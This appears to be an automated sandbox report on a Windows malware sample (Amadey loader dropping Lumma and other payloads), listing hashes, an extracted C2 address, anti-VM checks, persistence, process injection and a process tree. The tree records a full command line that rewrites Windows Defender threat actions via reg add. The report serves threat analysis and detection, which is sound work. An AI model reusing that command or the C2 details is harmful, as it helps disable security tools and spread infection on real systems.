Analysis
max time kernel: 64s
max time network: 92s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 11/05/2024, 22:25
Static task: static1
Behavioral task: behavioral1
  Sample: c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
  Resource: win10v2004-20240508-en
Behavioral task: behavioral2
  Sample: c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
  Resource: win11-20240426-en
Errors
General
Target: c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Size: 1.8MB
MD5: aa09230e5ed56143e839e2de4a55ff84
SHA1: ac65861dfb9663bffb9e3debfbefadf2d7f18c67
SHA256: c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea
SHA512: 92bd273f18be76cadb1f73d4897770ba2ebd7b2495b0de8e335290ed1be9d003b34859b9f24577326ebe477ed339c9affd1c57a8732aac8424b74ab448132cba
SSDEEP: 24576:tPh8UVW8RXWZ6gprwfpN6ZubIu85NeUSlTwIqVQFtI6a4wfDHtHavmcQi7fI83pa:tZfqUN6R5HmFzTw5HohQup3pXK
Malware Config
Extracted: amadey 4.20
http://5.42.96.7
install_dir: 7af68cdb52
install_file: axplons.exe
strings_key: e2ce58e78f631ed97d01fe7b70e85d5e
url_paths: /zamo7h/index.php
Signatures

Modifies firewall policy service (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | CDwwlA0Ls45oQEjOyyQKhuPH.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
description | pid | Process | procid_target
PID 3692 created 1084 | 3692 | deat.exe | 50
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplons.exe
Downloads MZ/PE file

Checks BIOS information in registry (2 TTPs, 6 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplons.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Drops startup file (7 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QIzW4tTnR5wqxhqY3fzpSUXQ.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bSAYlQpWBGa5aJGrotVK9Gdj.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z1QRKg56FPaUBj9lH8ZZhZUq.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xG3Dia32NuP8zHqHStzoZEVB.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sr8ILJx7yg64A1wFkUmquwVS.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wBlX6H1a9hrkhVlJlStFwR30.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\teQ8AtSSxpu2pFNcIagfsp4u.bat | jsc.exe
Executes dropped EXE (10 IoCs)
pid | Process
3992 | axplons.exe
1912 | lumma1.exe
3024 | axplons.exe
2948 | file300un.exe
3692 | deat.exe
2200 | 7qGcwJrNG8TOz7Ue3r67oBl0.exe
2864 | IEjcMJAJkbtWNiKSfd04xP0y.exe
984 | t4ogfR8kzuEXiFbHpQ2MOvGH.exe
1716 | 35bjmBERCDyFvBhlEXzObc63.exe
4944 | CDwwlA0Ls45oQEjOyyQKhuPH.exe
Identifies Wine through registry keys (2 TTPs, 3 IoCs)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
Key opened | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine | axplons.exe
Key opened | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Wine | axplons.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
flow | ioc
11 | pastebin.com
16 | pastebin.com

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
31 | ipinfo.io
36 | ipinfo.io
Drops file in System32 directory (4 IoCs)
description | ioc | Process
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | CDwwlA0Ls45oQEjOyyQKhuPH.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | CDwwlA0Ls45oQEjOyyQKhuPH.exe
File opened for modification | C:\Windows\System32\GroupPolicy | CDwwlA0Ls45oQEjOyyQKhuPH.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | CDwwlA0Ls45oQEjOyyQKhuPH.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (3 IoCs)
pid | Process
3492 | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe
3992 | axplons.exe
3024 | axplons.exe

Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 1912 set thread context of 2600 | 1912 | lumma1.exe | 86
PID 1444 set thread context of 1128 | 1444 | powershell.exe | 95
Drops file in Windows directory (1 IoCs)
description | ioc | Process
File created | C:\Windows\Tasks\axplons.job | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe

Command and Scripting Interpreter: PowerShell
pid | Process
1444 | powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (20 IoCs)
pid | Process | occurrences
3492 | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe | 2
3992 | axplons.exe | 2
3024 | axplons.exe | 2
1444 | powershell.exe | 8
3692 | deat.exe | 2
564 | dialer.exe | 4
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1444 | powershell.exe
Token: SeDebugPrivilege | 1128 | jsc.exe
Suspicious use of WriteProcessMemory (57 IoCs)
description | pid | Process | procid_target | occurrences
PID 3492 wrote to memory of 3992 | 3492 | c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe | 82 | 3
PID 3992 wrote to memory of 1912 | 3992 | axplons.exe | 83 | 3
PID 1912 wrote to memory of 4012 | 1912 | lumma1.exe | 85 | 3
PID 1912 wrote to memory of 2600 | 1912 | lumma1.exe | 86 | 9
PID 3992 wrote to memory of 2948 | 3992 | axplons.exe | 88 | 2
PID 2948 wrote to memory of 2892 | 2948 | file300un.exe | 90 | 2
PID 2892 wrote to memory of 1444 | 2892 | cmd.exe | 91 | 2
PID 3992 wrote to memory of 3692 | 3992 | axplons.exe | 93 | 3
PID 3692 wrote to memory of 564 | 3692 | deat.exe | 94 | 5
PID 1444 wrote to memory of 1128 | 1444 | powershell.exe | 95 | 8
PID 1444 wrote to memory of 4980 | 1444 | powershell.exe | 96 | 3
PID 1128 wrote to memory of 2200 | 1128 | jsc.exe | 100 | 3
PID 1128 wrote to memory of 2864 | 1128 | jsc.exe | 101 | 3
PID 1128 wrote to memory of 984 | 1128 | jsc.exe | 102 | 3
PID 1128 wrote to memory of 1716 | 1128 | jsc.exe | 103 | 3
PID 1128 wrote to memory of 4944 | 1128 | jsc.exe | 104 | 2
Processes
Tree depth in brackets; columns: image path | command line | PID. Signatures matched by each process are listed beneath it.

[1] C:\Windows\system32\sihost.exe | sihost.exe | PID:1084
  [2] C:\Windows\SysWOW64\dialer.exe | "C:\Windows\system32\dialer.exe" | PID:564
      - Suspicious behavior: EnumeratesProcesses

[1] C:\Users\Admin\AppData\Local\Temp\c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe | "C:\Users\Admin\AppData\Local\Temp\c511c4cfc3b7a440e8805c04017261c97182ddf76a26d69130bd2c36284141ea.exe" | PID:3492
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe" | PID:3992
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe | "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe" | PID:1912
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | PID:4012
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | PID:2600
    [3] C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe | "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe" | PID:2948
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand 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" | PID:2892
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -EncodedCommand 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 | PID:1444
            - Suspicious use of SetThreadContext
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" | PID:1128
              - Drops startup file
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
            [7] C:\Users\Admin\Pictures\7qGcwJrNG8TOz7Ue3r67oBl0.exe | "C:\Users\Admin\Pictures\7qGcwJrNG8TOz7Ue3r67oBl0.exe" | PID:2200
                - Executes dropped EXE
            [7] C:\Users\Admin\Pictures\IEjcMJAJkbtWNiKSfd04xP0y.exe | "C:\Users\Admin\Pictures\IEjcMJAJkbtWNiKSfd04xP0y.exe" | PID:2864
                - Executes dropped EXE
            [7] C:\Users\Admin\Pictures\t4ogfR8kzuEXiFbHpQ2MOvGH.exe | "C:\Users\Admin\Pictures\t4ogfR8kzuEXiFbHpQ2MOvGH.exe" | PID:984
                - Executes dropped EXE
              [8] C:\Users\Admin\AppData\Local\Temp\urc.0.exe | "C:\Users\Admin\AppData\Local\Temp\urc.0.exe" | PID:4724
            [7] C:\Users\Admin\Pictures\35bjmBERCDyFvBhlEXzObc63.exe | "C:\Users\Admin\Pictures\35bjmBERCDyFvBhlEXzObc63.exe" | PID:1716
                - Executes dropped EXE
            [7] C:\Users\Admin\Pictures\CDwwlA0Ls45oQEjOyyQKhuPH.exe | "C:\Users\Admin\Pictures\CDwwlA0Ls45oQEjOyyQKhuPH.exe" | PID:4944
                - Modifies firewall policy service
                - Executes dropped EXE
                - Drops file in System32 directory
            [7] C:\Users\Admin\Pictures\9RcB2lrFzwAc9yeZcDFpU6Tm.exe | "C:\Users\Admin\Pictures\9RcB2lrFzwAc9yeZcDFpU6Tm.exe" | PID:3716
            [7] C:\Users\Admin\Pictures\n3rp3ahi5KCTVJeUG6vZj6EO.exe | "C:\Users\Admin\Pictures\n3rp3ahi5KCTVJeUG6vZj6EO.exe" | PID:3820
              [8] C:\Users\Admin\AppData\Local\Temp\7zS56B6.tmp\Install.exe | .\Install.exe /tEdidDDf "385118" /S | PID:4912
                [9] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" | PID:1784
          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" | PID:4980
    [3] C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe | "C:\Users\Admin\AppData\Local\Temp\1000014001\deat.exe" | PID:3692
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory

[1] C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | PID:3024
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc | PID:5060

[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum | PID:4400
Network
MITRE ATT&CK Enterprise v15
Downloads